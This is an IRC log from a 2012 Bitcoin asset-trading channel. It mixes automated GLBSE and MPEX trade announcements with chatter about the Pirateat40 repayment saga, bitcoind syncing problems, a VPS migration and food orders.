@ 0.63 BTC [+] Aug 22 20:47:25 [GLBSE] [NASTY] 1 @ 0.62 BTC [-] Aug 22 20:47:26 [GLBSE] [NASTY] 1 @ 0.6 BTC [-] Aug 22 20:47:28 [GLBSE] [NASTY] 50 @ 0.6 = 30 BTC [-] Aug 22 20:47:29 [GLBSE] [NASTY] 5 @ 0.6 = 3 BTC [-] Aug 22 20:49:34 I am in China Aug 22 20:49:44 heading back to UK at end of the month Aug 22 20:49:54 so Im staying in london for the month Aug 22 20:50:00 I need a place obvious Aug 22 20:50:12 so I booked a place on airbnb Aug 22 20:50:18 15 mins walk from london bridge Aug 22 20:50:24 is it falling down? Aug 22 20:50:29 har Aug 22 20:50:30 har Aug 22 20:50:31 har Aug 22 20:50:36 lol Aug 22 20:50:36 you dont have a home, do you? :) Aug 22 20:50:51 tonikt: not in london no Aug 22 20:50:58 my home is in manchester Aug 22 20:51:01 i read somewhere that you come from canada? Aug 22 20:51:04 ah Aug 22 20:51:08 Ireland Aug 22 20:51:10 actually Aug 22 20:51:13 nefario: it works! https://199.48.69.241/hotwallet/index2.php Aug 22 20:51:22 so, the rumors were false Aug 22 20:51:24 [GLBSE] [TYGRR.BOND-A] 20 @ 0.095 = 1.9 BTC [+] Aug 22 20:51:26 [GLBSE] [TYGRR.BOND-A] 30 @ 0.01 = 0.3 BTC [-] Aug 22 20:51:38 usagi: the css? Aug 22 20:51:39 Guys I owe it to nefario for introducing me to bitplatform.. or.. um.. bitsomething Aug 22 20:51:44 but why did you decide to set GLBSE time to america? Aug 22 20:51:44 batcave Aug 22 20:51:46 botnet Aug 22 20:51:48 [GLBSE] [FOO.PPPPT] 5 @ 0.47 = 2.35 BTC [+] Aug 22 20:51:51 [GLBSE] [FOO.PPPPT] 10 @ 0.475 = 4.75 BTC [+] Aug 22 20:51:52 [GLBSE] [FOO.PPPPT] 50 @ 0.485 = 24.25 BTC [+] Aug 22 20:51:54 [GLBSE] [FOO.PPPPT] 35 @ 0.489899 = 17.1465 BTC [+] Aug 22 20:51:55 cause america is #1 Aug 22 20:51:56 probably Aug 22 20:52:06 #1 in being cool Aug 22 20:52:06 bingo... bloody mary... whats that damn thing called.. Oh yeah, bootstrap Aug 22 20:52:06 bootstrap Aug 22 20:52:17 bootstrap suhks Aug 22 20:52:22 nice, like the logo Aug 22 20:52:30 [GLBSE] [BIB.PIRATE] 25 @ 0.43 = 10.75 BTC [+] Aug 22 20:52:37 rg: do show us the oh so much better alternative you've made Aug 22 20:52:48 wait Aug 22 20:52:49 wait Aug 22 20:52:54 let me hold my breadth Aug 22 20:53:02 *** breaths in *** Aug 22 20:53:07 just cause something sucks doesnt mean i went out and made an alternative Aug 22 20:53:14 there we go Aug 22 20:53:30 does bootstrap come with the failwhale pic out of the box ? Aug 22 20:53:34 just cause rap music sucks doesnt mean you went out and reinvented the genre Aug 22 20:53:35 duh Aug 22 20:53:59 hey, bootstrap looks good im Aug 22 20:54:01 Well mircea Aug 22 20:54:02 imo Aug 22 20:54:10 yeah but every ste uses it Aug 22 20:54:18 it has css and especially round corners. i hate it. Aug 22 20:54:18 usagi: now you've got the hard part to do Aug 22 20:54:21 The altertnative is to use html tables like I was when I was prototyping the site........ Aug 22 20:54:28 oops, my bad, sorry ^^ Aug 22 20:55:17 I'm going to make a game that people can play on my site Aug 22 20:55:32 it will be cool Aug 22 20:55:46 [GLBSE] [TYGRR.BOND-P] 10 @ 0.7 = 7 BTC [-] Aug 22 20:56:12 [GLBSE] [TYGRR.BOND-P] 21 @ 0.7189 = 15.0969 BTC [+] Aug 22 20:56:39 [GLBSE] [TYGRR.BOND-P] 21 @ 0.719 = 15.099 BTC [+] Aug 22 20:56:43 [GLBSE] [TYGRR.BOND-P] 10 @ 0.719 = 7.19 BTC [+] Aug 22 20:58:06 [GLBSE] [TYGRR.BOND-P] 10 @ 0.719 = 7.19 BTC [+] Aug 22 20:58:09 [GLBSE] [BIB.PIRATE] 5 @ 0.45 = 2.25 BTC [+] Aug 22 20:58:11 pirate is paying people in #btcst Aug 22 20:58:18 pirate debt going up... up.... Aug 22 20:58:25 [GLBSE] [TYGRR.BOND-P] 3 @ 0.719 = 2.157 BTC [+] Aug 22 20:58:57 [GLBSE] [BIB.PIRATE] 25 @ 0.46 = 11.5 BTC [+] Aug 22 20:58:58 [GLBSE] [BIB.PIRATE] 50 @ 0.479899 = 23.995 BTC [+] Aug 22 20:59:03 [GLBSE] [TYGRR.BOND-P] 4 @ 0.74999999 = 3 BTC [+] Aug 22 20:59:32 TRADE YAYYYYYYY! Aug 22 20:59:34 If you bought debt under .50 you did an excellent job Aug 22 20:59:36 buy buy buy Aug 22 20:59:43 [GLBSE] [TYGRR.BOND-P] 6 @ 0.74999999 = 4.5 BTC [+] Aug 22 20:59:45 [GLBSE] [TYGRR.BOND-P] 8 @ 0.798 = 6.384 BTC [+] Aug 22 20:59:46 [GLBSE] [TYGRR.BOND-P] 6 @ 0.82799999 = 4.968 BTC [+] Aug 22 20:59:51 lol Aug 22 20:59:53 YAAAAY! Aug 22 20:59:58 [GLBSE] [OBSI.HRPT] 2 @ 0.104 = 0.208 BTC [-] Aug 22 21:00:01 \0/ Aug 22 21:00:12 ok time for a crash now Aug 22 21:00:16 bitcoin is about to end Aug 22 21:00:16 lol Aug 22 21:00:19 [GLBSE] [FOO.PPPPT] 15 @ 0.489899 = 7.3485 BTC [+] Aug 22 21:00:21 everybody PANIC Aug 22 21:00:21 NOW Aug 22 21:00:23 SERIOUSLY Aug 22 21:00:24 PANIC Aug 22 21:00:25 DIE Aug 22 21:00:25 its the end of the bitcoin Aug 22 21:00:26 Yeah I heard that news too Aug 22 21:00:31 as we know it Aug 22 21:00:34 [GLBSE] [TYGRR.BOND-P] 4 @ 0.82799999 = 3.312 BTC [+] Aug 22 21:00:35 [GLBSE] [BIB.PIRATE] 1 @ 0.479899 BTC [+] Aug 22 21:00:37 [GLBSE] [BIB.PIRATE] 20 @ 0.4799 = 9.598 BTC [+] Aug 22 21:00:38 [GLBSE] [BIB.PIRATE] 20 @ 0.4876 = 9.752 BTC [+] Aug 22 21:00:39 [GLBSE] [BIB.PIRATE] 10 @ 0.49998 = 4.9998 BTC [+] Aug 22 21:00:41 lmao Aug 22 21:00:54 ;;market sell 200000 Aug 22 21:00:56 nwo we find out exacrtly how much capital glbse investors have Aug 22 21:01:09 seeing how if they don't have enough btc to buy those assets bering them back to 1... Aug 22 21:01:11 I know how much Aug 22 21:01:15 gribble is broken Aug 22 21:01:16 [GLBSE] [FOO.PPPPT] 10 @ 0.63 = 6.3 BTC [+] Aug 22 21:01:16 [GLBSE] [FOO.PPPPT] 5 @ 0.65 = 3.25 BTC [+] Aug 22 21:01:17 [GLBSE] [FOO.PPPPT] 5 @ 0.67 = 3.35 BTC [+] Aug 22 21:01:21 it didn't get its spoof Aug 22 21:01:26 so its not joining any channels Aug 22 21:01:39 poor gribs Aug 22 21:02:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.84 BTC [+] Aug 22 21:02:25 [GLBSE] [TYGRR.BOND-P] 40 @ 0.86 = 34.4 BTC [+] Aug 22 21:02:39 lol Pirateat40 paid some little accounts (by using btc from big accounts) and everybody thinks PPT`s are worth something LMFAO Aug 22 21:02:50 [GLBSE] [NYAN.C] 3 @ 0.94 = 2.82 BTC [+] Aug 22 21:02:51 [GLBSE] [NYAN.C] 10 @ 0.95 = 9.5 BTC [+] Aug 22 21:02:53 [GLBSE] [NYAN.C] 3 @ 0.955 = 2.865 BTC [+] Aug 22 21:02:54 [GLBSE] [NYAN.C] 2 @ 0.96 = 1.92 BTC [+] Aug 22 21:02:54 [GLBSE] [NYAN.C] 5 @ 0.9659 = 4.8295 BTC [+] Aug 22 21:03:03 this is funny Aug 22 21:03:05 NYAN.C will be worth 1.50 if pirate pays out btw Aug 22 21:03:08 ah Aug 22 21:03:11 1.50-1.60 Aug 22 21:03:13 IF Aug 22 21:03:13 PsychoticBoy shhh! Aug 22 21:03:18 let it rally lol Aug 22 21:03:18 lol Aug 22 21:03:20 **"IF"** Aug 22 21:06:48 http://polimedia.us/dtng/c/src/134565791021.jpg << various uninsured pirate passthroughs on the news pirate paid 10 btc Aug 22 21:07:12 nefario: Your site needs a search function. Aug 22 21:07:20 and tags Aug 22 21:07:20 for what? Aug 22 21:07:24 The securities Aug 22 21:07:32 I'll add it later Aug 22 21:07:35 tags sooner Aug 22 21:07:36 [MPEX] [S.MPOE] 36544 @ 0.00039485 = 14.4294 BTC [-] Aug 22 21:07:37 [MPEX] [S.MPOE] 1700 @ 0.0003934 = 0.6688 BTC [-] Aug 22 21:07:39 [MPEX] [S.MPOE] 10756 @ 0.00039332 = 4.2305 BTC [-] Aug 22 21:07:40 Cool beans if you do : ) Aug 22 21:09:03 lol mircea_popescu Aug 22 21:09:57 PsychoticBoy source= Aug 22 21:09:58 ? Aug 22 21:10:16 I had to CTRL-F to find NYAN.C Aug 22 21:10:22 That isn't good, yo. Aug 22 21:10:27 so what's wrong with ctrl-f srsly ? Aug 22 21:10:39 Stupid people don't CTRL-F Aug 22 21:10:42 It's bad marketing Aug 22 21:10:53 o i c Aug 22 21:11:31 lol Aug 22 21:11:38 how many stupid people use glbse Aug 22 21:11:43 so uhh Aug 22 21:11:50 who bought all tygrr bond p? Aug 22 21:12:35 I believe chaang-noi is buying them back Aug 22 21:12:45 hah Aug 22 21:12:52 if hes gotten fully paid Aug 22 21:12:58 then that is a bargain for him Aug 22 21:13:01 ineededausername yes. Aug 22 21:13:13 so he doesn't have to pay them. I guess he trust pirate Aug 22 21:13:21 could be he got paid Aug 22 21:13:32 GLBSE does execute trades at the price specified Aug 22 21:13:33 :O Aug 22 21:13:40 it does it at the price specified or better Aug 22 21:13:49 is those sells were there and he put in 1BTC Aug 22 21:13:50 ineedausername: When did you get here? Aug 22 21:14:03 ? Aug 22 21:14:04 nefario you think he did ? Aug 22 21:14:05 then he got them for whatever price they were below 1 Aug 22 21:14:07 get where Aug 22 21:14:15 dont know mircea_popescu Aug 22 21:14:26 if he did then he's saved himself a ton Aug 22 21:14:36 why would he? Aug 22 21:14:41 and if he didn't he's going bankrupt. Aug 22 21:15:01 I believe no one got paid yet, including Chaang Aug 22 21:15:03 were those the "insured" ones? Aug 22 21:15:09 no. Aug 22 21:15:16 BTCHero i am of the same persuasion. Aug 22 21:15:17 then he didnt buy them Aug 22 21:15:34 he won't pay on the ones that aren't insured Aug 22 21:15:36 I think Aug 22 21:15:39 ineedausername: This channel. Aug 22 21:15:45 nefario he might have. he strikes me as an ambitious but rather erratic fellow. Aug 22 21:15:48 oh, just then Aug 22 21:15:53 [14:06] == ineededausername [cc551805@gateway/web/freenode/session] has joined #bitcoin-assets Aug 22 21:15:58 ineededausername so how do you like it ? Aug 22 21:16:27 mircea_popescu: eratic is stating it mildly Aug 22 21:16:31 like what :) Aug 22 21:16:39 i guess it is. Aug 22 21:16:40 this channel? it's lively, I guess Aug 22 21:16:43 BTCMining: some people got paid already Aug 22 21:16:45 ineededausername the channel lol. ya Aug 22 21:16:46 bah fuck .... would love to stay here and watch more drama but real life needs me Aug 22 21:16:48 o Aug 22 21:17:11 ineededausername who got paid ? Aug 22 21:17:15 ineededausername: source? Aug 22 21:17:17 source to payouts? Aug 22 21:17:34 I've only seen one guy claiming so and he got paid 150 BTC... Aug 22 21:17:40 it's fun to see a channel talking only 75% of the time about pirate Aug 22 21:17:41 not 100% xSD Aug 22 21:17:43 too much pirate talk now Aug 22 21:17:44 i had a day dream about if bcst said they were hacked Aug 22 21:17:47 small investors got paid (6 of them) Aug 22 21:17:47 it was funny Aug 22 21:17:48 wOAH Aug 22 21:17:49 now pirate is out of btc Aug 22 21:17:50 no more payouts til tomorrow Aug 22 21:17:52 https://bitcointalk.org/index.php?topic=101942.msg1124019#msg1124019 Aug 22 21:17:59 [GLBSE] [OBSI.HRPT] 4 @ 0.10485 = 0.4194 BTC [+] Aug 22 21:18:00 [GLBSE] [OBSI.HRPT] 1 @ 0.1049 BTC [+] Aug 22 21:18:08 wasn't he supposed to do olderst first, starting monday ? Aug 22 21:18:16 BTCMining: pirate confirmed, I looked at blockchain and it was there Aug 22 21:18:19 now we're on smallest first wednesday Aug 22 21:18:22 that's small claims. I'm not buying that until the real accounts or paid Aug 22 21:18:22 18:17 < ineededausername> it's fun to see a channel talking only 75% of the time about pirate Aug 22 21:18:28 :D Aug 22 21:18:32 s.dice!!!! Aug 22 21:18:43 brokerages services!!! :D Aug 22 21:18:52 s.bvps Aug 22 21:18:58 20:18.23 ( mircea_popescu ) now we're on smallest first wednesday Aug 22 21:18:58 that too :D Aug 22 21:18:58 lol Aug 22 21:19:04 [GLBSE] [TYGRR.BOND-PI] 9 @ 1 = 9 BTC [+] Aug 22 21:19:06 smickles: I picture you vibrating violently with excitement in front of your monitor Aug 22 21:19:20 [GLBSE] [NYAN.C] 9 @ 0.988 = 8.892 BTC [+] Aug 22 21:19:25 smickles you should make a company Aug 22 21:19:27 lol ya srsly, smickles has it. Aug 22 21:19:29 and have an asset Aug 22 21:19:43 id buy services from smickles Aug 22 21:19:45 although, it's not a monitor so much as a ~100 inch screen Aug 22 21:19:52 ya srsly. he should start an accounting firm Aug 22 21:20:04 pay i dunno, 1 btc a month, have your financial report made right. Aug 22 21:20:07 let me move to AZ first Aug 22 21:20:35 [GLBSE] [BTCMC] 1 @ 0.5499 BTC [-] Aug 22 21:20:38 later guys, enjoy Aug 22 21:20:38 i plan to form a llc, maybe even an llc to act as the agent to make the llc Aug 22 21:20:41 As far as I'm concerned, pirate is buying time to run away with funds. If he confirms he decided to instead pay 6 very small amounts to new accounts instead of the large, older ones on monday... Aug 22 21:20:58 BTCHero i guess that's confirmed already. Aug 22 21:21:13 smickles why all the llcs ? Aug 22 21:21:24 mircea_popescu: becaus 'merica sucks that way Aug 22 21:21:33 so you think llc train helps ? Aug 22 21:21:38 pirate only paid to shushhh peoples mouth, and used the big accounts btc to pay the smaal once, pyramid scam Aug 22 21:21:59 if someone is going to sue me into shit, i want it to be some ficticious government entitiy that takes the shit Aug 22 21:21:59 i open the floor to wild allegations Aug 22 21:22:05 oh wait, its clearly already open Aug 22 21:22:15 lol Aug 22 21:22:28 you know what's good as a snack Aug 22 21:22:29 apple sauce Aug 22 21:22:34 smickles in general the likeliness to be sued is proportional to your net worth Aug 22 21:22:46 mircea_popescu: well, i have plans for my net worth Aug 22 21:22:51 :D Aug 22 21:23:01 gotta give it to the man.. he IS vibrating. Aug 22 21:23:03 That's why you don't tell people how much you are worth Aug 22 21:23:13 or you are in for a bad time Aug 22 21:23:46 mk this is ridiculous Aug 22 21:23:53 this? Aug 22 21:23:56 this girl's husband is in the hospital Aug 22 21:24:03 they were having marriage problems Aug 22 21:24:11 and he bought some penis improver thing on the internet Aug 22 21:24:23 what Aug 22 21:24:25 am i reading Aug 22 21:24:34 one line Aug 22 21:24:36 at a time Aug 22 21:24:54 oh hai ciuciu Aug 22 21:24:59 bitcoin-assets - Improve your asset with PenisImprov9001! Aug 22 21:25:13 i think he was trying to improve her ass-et. Aug 22 21:25:45 stil fighting the good fight i see Aug 22 21:25:58 huh ? Aug 22 21:26:06 mircea_popescu: ciuciu Aug 22 21:26:10 anyway, i suppose i should pay a visit but i dunno if ill be able to not explode laughing Aug 22 21:26:10 [GLBSE] [BIB.PIRATE] 20 @ 0.6 = 12 BTC [+] Aug 22 21:26:42 o, that fello still around ? Aug 22 21:26:55 i wouldn't expect him(?) to leave Aug 22 21:27:11 unemployment does run out eventually... Aug 22 21:27:38 almost 1mn shares of s.dice are already bid on Aug 22 21:28:59 pretty cool. Aug 22 21:29:50 As of November 2011 no sites have been blocked in Romania and the proposals have been ignored. Aug 22 21:29:54 nice Aug 22 21:30:12 ciuciu: that link suggests that porn will not be blocked in romania Aug 22 21:30:27 fuck you bitcoind Aug 22 21:30:52 unresponsive sack of shit Aug 22 21:31:05 nefario: might have better luck if you connect to a known fast node Aug 22 21:31:16 so atleast download speed isnt limiting the time Aug 22 21:31:19 just shitty slow bitcoind is Aug 22 21:32:01 rg in truth, i think the paring of chain can't long be avoided Aug 22 21:32:03 nefario: what's the trouble? Aug 22 21:32:09 we'll end up with the greedy clients soon. Aug 22 21:32:31 bitcoind is ridiculous right now Aug 22 21:32:47 there are proposals for improvement being worked on tho Aug 22 21:32:51 asking someone to take up 2gb+ just to send an obscure fake currency Aug 22 21:32:54 i still can't believe they haven't merged coincontrol. Aug 22 21:32:55 come on Aug 22 21:33:24 smickles: all they will do is complain, slander each other on the forum, and get nothing completed Aug 22 21:33:31 that's what bitcoin-dev does Aug 22 21:33:34 rg its because if gmaxwell i bet. Aug 22 21:33:42 doesn't luke have a version outthere w/coincontrol? Aug 22 21:33:48 its more that other dbag Aug 22 21:33:48 [GLBSE] [TYGRR.BOND-P] 10 @ 0.719 = 7.19 BTC [-] Aug 22 21:33:50 the main guy Aug 22 21:33:50 that idiot could turn anything into crap. Aug 22 21:33:52 i forget his name Aug 22 21:34:03 smickles i think it's minimal, buggy and unmaintained. Aug 22 21:34:08 smickles: downloading the blockchain, bitcoind is totaly unresponsive Aug 22 21:34:41 nefario: have you tried setting the datadir up in a ramdisk while downloading it? Aug 22 21:34:42 it takes a second Aug 22 21:34:43 it usually works for me Aug 22 21:34:52 maybe your pc is just too slow Aug 22 21:34:57 smickles that's not a bad idea Aug 22 21:35:00 that's not a bad idea at all Aug 22 21:35:05 actually its a great ideea Aug 22 21:35:26 too bad i cant force VPS customers to do that Aug 22 21:35:37 didnt you offer predownloaded chain ? Aug 22 21:35:47 rg, give me enough ram, and i will Aug 22 21:35:57 move to california2 Aug 22 21:35:59 (not that i have bitcoind running on my vps) Aug 22 21:36:14 more ram at no extra cost to move to cali2? Aug 22 21:36:27 yes Aug 22 21:36:31 double your current alotment Aug 22 21:36:40 WHY DIDN"T I ALREADY KNOW THIS?? Aug 22 21:36:47 rg is secretive. Aug 22 21:36:58 he finds the best way to run a biz is dribble news items to customers. Aug 22 21:37:09 it only says it on the main page of bitvps.com Aug 22 21:37:13 shh! Aug 22 21:37:22 rg, can i just shutdown, and you copy my image over there, power on, and it works w/o additional setup? Aug 22 21:37:24 and all our bitcointalk threads Aug 22 21:37:29 Joey tight lips, yove been shot Aug 22 21:37:38 go suck a lemon Aug 22 21:37:50 what you want me to tell the doctor? Aug 22 21:38:02 johnny tight lips, hows your mother? ey oh who says i got a mother? Aug 22 21:38:04 well, i guess i need to change my domainname ns info Aug 22 21:38:11 YES Aug 22 21:38:17 do you have a real vm Aug 22 21:38:19 or an openvz Aug 22 21:39:01 [MPEX] [F.GIGA.ETF] 5700 @ 0.00103109 = 5.8772 BTC [-] Aug 22 21:39:02 [MPEX] [F.GIGA.ETF] 6647 @ 0.00101865 = 6.771 BTC [-] Aug 22 21:39:21 oh, i don't remember, i orderd openvz, but you were delayed a little and said that you gave me a real vm, but i'm not sure if you actually did Aug 22 21:39:35 how would i know? Aug 22 21:39:45 is there a cup to pee in or somethign? Aug 22 21:39:56 type uname -a Aug 22 21:40:02 if it says 2.6.xx-pve Aug 22 21:40:08 you have an openvz vm Aug 22 21:41:00 i don't see 2.6.anything in that line Aug 22 21:41:08 wait does your last name Aug 22 21:41:11 start with a C Aug 22 21:41:14 yea Aug 22 21:41:25 and your first name is the letter after l Aug 22 21:41:28 ? Aug 22 21:41:32 yeah Aug 22 21:41:35 ok Aug 22 21:41:39 i know where you are Aug 22 21:41:50 you could /exec whois mostofmany.com ... ithink Aug 22 21:41:56 hmm actually downloading quite fast Aug 22 21:42:00 17 connections Aug 22 21:42:03 i didn't wanna leak your infos brobot Aug 22 21:42:14 you dont have to do anything Aug 22 21:42:22 if you're ready to move now just give me the OK Aug 22 21:42:25 you will get a new IP Aug 22 21:42:29 is this understood gypsey? Aug 22 21:42:42 let me hop on another irc connection right quick Aug 22 21:43:53 ^ Aug 22 21:44:31 hmm, i should probably shutdown the MC server and back up the map first Aug 22 21:45:05 oh, i guess you think it's safe enough ;) Aug 22 21:46:15 well Aug 22 21:46:18 i shut it down properly Aug 22 21:46:23 so if your scripts are proper Aug 22 21:46:26 everything will be fine Aug 22 21:46:31 i think they are Aug 22 21:46:33 it did some copy shit Aug 22 21:46:34 when i shut it off Aug 22 21:46:37 something called tekkit Aug 22 21:46:41 that's it Aug 22 21:47:03 yes Aug 22 21:47:09 i was both confused and enraged when i saw it Aug 22 21:47:13 and aroused Aug 22 21:47:38 cal2 is better than chi Aug 22 21:47:43 chi needs an upgrade Aug 22 21:47:49 but the dc we're at charges too much money Aug 22 21:48:11 ah, that's too bad Aug 22 21:48:11 the price we pay for our server .. i guess i like talked them into some special deal Aug 22 21:48:22 so all their other servers are like ... not comparably priced Aug 22 21:48:49 i got thm to give us 100 free ips Aug 22 21:49:22 most of my users are in missouri, i hope cali isn't so far away as to cause too much latency Aug 22 21:49:41 ipv4 ips? Aug 22 21:50:03 cal2.vm.bitvps.com Aug 22 21:50:16 its probably 50ms Aug 22 21:50:21 [GLBSE] [PUREMINING] 10 @ 0.13898 = 1.3898 BTC [+] Aug 22 21:50:31 that's my guess Aug 22 21:50:31 what it is Aug 22 21:50:33 55 ? Aug 22 21:51:45 well, i'm in NC, but i get 89 Aug 22 21:51:55 rough Aug 22 21:52:05 i get 98 here Aug 22 21:52:09 it's 'cause of time warner Aug 22 21:52:10 but honestly Aug 22 21:52:19 anything under 200ms Aug 22 21:52:21 you wouldntn otice Aug 22 21:52:32 well, not for minecraft anyway Aug 22 21:52:58 i login to a box for work that is 150ms Aug 22 21:53:03 with ssh Aug 22 21:53:05 and i dont notice it Aug 22 21:53:19 cal2 has native ipv6 too Aug 22 21:53:31 so you'll be all 2005 on us Aug 22 21:53:59 http://i.imgur.com/tVatg.png Aug 22 21:54:02 with the wife watching a streaming movie, and a 170ish latency, my ssh will break a pipe sometimes Aug 22 21:54:16 If you're in Indiana, you need to watch out. Aug 22 21:54:17 http://www.jconline.com/article/20120822/NEWS/308220013/FBI-doing-statewide-raid-agents-seen-Lafayette?odyssey=tab|topnews|text|FRONTPAGE&nclick_check=1 Aug 22 21:54:20 i think it due to the ram on my router Aug 22 21:54:51 wow Aug 22 21:54:58 what do you think th raids are for Aug 22 21:55:04 what's that about Aug 22 21:55:08 statewide? Aug 22 21:55:11 isn't indiana practically one large meth lab? Aug 22 21:55:13 brobot: that's lame, our old router used to run out of ram if we ran downloaded torrents Aug 22 21:55:20 so it would die Aug 22 21:55:30 rg: might be raiding bitcoin miners. ; ) Aug 22 21:55:32 lol Aug 22 21:55:32 mine has way too much ram Aug 22 21:55:34 indiana isnt bad Aug 22 21:55:58 every movie with an all american family is based in indiana Aug 22 21:56:15 hence the irony Aug 22 21:56:26 i lived in minnesota for awhile Aug 22 21:56:29 they love meth there Aug 22 21:56:30 prolly a large meth ring then Aug 22 21:56:34 lol Aug 22 21:56:37 beat me to it Aug 22 21:56:58 [GLBSE] [KRAKEN] 10 @ 0.01 = 0.1 BTC Aug 22 21:57:43 what the hell is kraken Aug 22 21:57:52 the asset description basically gives no useful info Aug 22 21:58:25 huh, what's this cryptostocks.com? Aug 22 21:58:58 [GLBSE] [ARS] 1 @ 0.012 BTC [+] Aug 22 21:59:10 rg its btc-miner's passtyhroguh for patrick harnett's thing Aug 22 22:00:11 why the fuck does the guy from The Faculty have a bitcoin asset Aug 22 22:00:22 whos that ? Aug 22 22:01:17 [GLBSE] [TYGRR.BOND-A] 100 @ 0.05 = 5 BTC [+] Aug 22 22:01:24 http://ia.media-imdb.com/images/M/MV5BMTgxMjg0Mzc1OV5BMl5BanBnXkFtZTcwODI3MzA2MQ@@._V1._SY314_CR5,0,214,314_.jpg Aug 22 22:01:28 josh hartnett Aug 22 22:01:45 what a doucheface Aug 22 22:02:01 ;;ident patrickharnett Aug 22 22:02:07 ok Aug 22 22:02:18 so how does patrick harnett make money Aug 22 22:02:35 He's retired Aug 22 22:02:40 He plays with money Aug 22 22:02:43 he already earned Aug 22 22:02:44 i think he lurks the forum and offers 1 btc to noobs at 50% Aug 22 22:03:06 It makes him feel good about himself Aug 22 22:04:10 since im still awake im gonna order lunch Aug 22 22:04:28 i want a small garden salad with feta cheese, no tomatos and creamy italian dressing Aug 22 22:04:39 and then a chicken finger dinner Aug 22 22:04:43 with extra sweet&sour Aug 22 22:05:11 dont project your gay confusion on me and mircea bro Aug 22 22:05:19 lol Aug 22 22:10:22 dam rg, you just have to ask for lunch when the it's a tight month for the usd budget here Aug 22 22:11:09 guess what Aug 22 22:11:16 i actually have paper money today Aug 22 22:11:16 ip? Aug 22 22:11:22 no way Aug 22 22:11:34 oh shit Aug 22 22:11:34 ip Aug 22 22:11:37 it already made the image Aug 22 22:11:39 sorry i spaced Aug 22 22:11:58 lo blood sugar, i suppose Aug 22 22:12:14 uploading Aug 22 22:12:33 i cant believe nickserv is still down Aug 22 22:12:39 my god damn tax dollars pay for this network Aug 22 22:12:43 and there isnt even nickserv Aug 22 22:12:45 lol Aug 22 22:12:52 Is this really paid with tax dollars? Aug 22 22:13:19 I shall embrace the dunce camp Aug 22 22:13:24 woww, rg had that had for a long time Aug 22 22:13:42 er, one of those was supposed to be hat Aug 22 22:14:03 yep Aug 22 22:14:09 it probably smells Aug 22 22:15:03 ballsackhat. Aug 22 22:15:04 this place makes such ridiculous salads Aug 22 22:15:39 rg has all the good delivery places Aug 22 22:16:09 S Y R I A N, Lettuce, Tomatoes, Cuccumbers, Peppers, Carrots, Red Cabage, Olives, Peppercini, Onions, ham , Roast Beef, T U R K E Y, American cheese and provolone cheese Aug 22 22:16:29 excuse the caps Aug 22 22:16:31 the town i live in, the chineese place only delivers in a thee mile radius Aug 22 22:16:32 they put them there, not me Aug 22 22:16:40 we cant even get good delivery chinese Aug 22 22:16:57 there are two decent places in town and one in the next town that has won the best chinese food in the county for years now Aug 22 22:17:04 none of them deliver Aug 22 22:17:16 Syria is about to blow up Aug 22 22:17:20 I'd get out of there Aug 22 22:17:23 the only place that does has broccoli that smells like farts Aug 22 22:17:32 its BREAD nikka Aug 22 22:18:56 lol here i am ordering an $18 lunch Aug 22 22:19:01 i better make sure i have the cash first Aug 22 22:19:45 oh what do you guys think about that bitcoin credit card Aug 22 22:20:09 will it ever actually come to fruition Aug 22 22:20:10 it'll probably cause me to give so much money to bitinstant on various whims Aug 22 22:20:27 ug, time warner calls, they have a special offer for me, i say i'm about to move to another state, "well, in that case, you should bundle your current internet service with phone and cable!" ... click Aug 22 22:20:44 Payment processing company MasterCard has denied that it is working with BitInstant to create an officially certified BitCoin debit card. Aug 22 22:20:54 that leaves visa ? Aug 22 22:20:57 This follows a report that claimed the virtual currency exchange could release a BitCoin debit card as early as October. Aug 22 22:20:57 UPDATE: We have been contacted by BitInstant co-founder Charlie Shrem, who has confirmed that the launch of the card is still on track. More updates to follow. Aug 22 22:21:09 discover ... Aug 22 22:21:17 no you fools Aug 22 22:21:26 Its Barclays card Aug 22 22:21:32 ha Aug 22 22:21:35 your flexible friend Aug 22 22:21:35 yeah well they didn't say that Aug 22 22:21:40 hsbc Aug 22 22:21:42 and the whole thing Aug 22 22:21:47 is going t obe rolled out by Aug 22 22:21:47 and ive pentested barclays Aug 22 22:21:49 Mr. Bean Aug 22 22:21:49 they can fuck off Aug 22 22:22:00 no good security no? Aug 22 22:22:07 lol, mr bean Aug 22 22:22:11 no they actually have a dedicated pen testing team Aug 22 22:22:14 but theyre noobs Aug 22 22:22:27 I love that talk Aug 22 22:22:34 "So Mr. Director" Aug 22 22:22:46 "We've let the pen testing team go" Aug 22 22:22:54 "according to our new hire" Aug 22 22:23:02 "they're a bunch of noobs" Aug 22 22:23:10 ha Aug 22 22:23:18 haha i dont work for barclays Aug 22 22:23:18 i've done that. Aug 22 22:23:34 i work for a company who gets paid to test the testers Aug 22 22:23:51 so if we find anything, someone gets in a LOT of trouble Aug 22 22:23:54 making it extra rewarding Aug 22 22:24:33 [GLBSE] [TYGRR.BOND-PI] 8 @ 1 = 8 BTC [+] Aug 22 22:25:44 [GLBSE] [ARS] 1 @ 0.013 BTC [+] Aug 22 22:27:34 ;;eauth smickles Aug 22 22:27:47 oo i better open the door so i can hear the delivery man or womenz Aug 22 22:27:50 no gribble? Aug 22 22:27:58 not yet Aug 22 22:28:00 services is down Aug 22 22:28:12 gribble wont join any channels unless it can activate its spoof Aug 22 22:28:17 with services down it cant Aug 22 22:28:27 ah Aug 22 22:28:29 and you also cant authorize to it because it requires you to be in the channel Aug 22 22:28:32 and so you can't msg him to do it either Aug 22 22:28:35 cause he cant' see you in chans Aug 22 22:28:39 yes lol Aug 22 22:28:43 [MPEX] [F.GIGA.ETF] 14000 @ 0.00102997 = 14.4196 BTC [+] Aug 22 22:28:45 is there a romanian echo in here Aug 22 22:28:45 [MPEX] [F.GIGA.ETF] 1800 @ 0.00101865 = 1.8336 BTC [-] Aug 22 22:31:35 [GLBSE] [GIGAMINING] 1 @ 0.942 BTC [-] Aug 22 22:31:53 rg, is there an eta on my new ip? i think i'm going to step away from the compy for a bit Aug 22 22:33:16 [GLBSE] [MMM] 1 @ 0.8 BTC [+] Aug 22 22:33:36 [MPEX] [S.MPOE] 31144 @ 0.00039332 = 12.2496 BTC [-] Aug 22 22:33:38 [MPEX] [S.MPOE] 9328 @ 0.00039327 = 3.6684 BTC [-] Aug 22 22:33:39 [MPEX] [S.MPOE] 17428 @ 0.00039287 = 6.8469 BTC [-] Aug 22 22:35:04 well Aug 22 22:35:07 [GLBSE] [PUREMINING] 8 @ 0.13898 = 1.1118 BTC [+] Aug 22 22:35:08 your VM is still scping Aug 22 22:35:14 vzdump-qemu-154-2012_08_22-13_45_59.tar.lzo 56% 17GB 15.8MB/s 13:58 ETA Aug 22 22:36:54 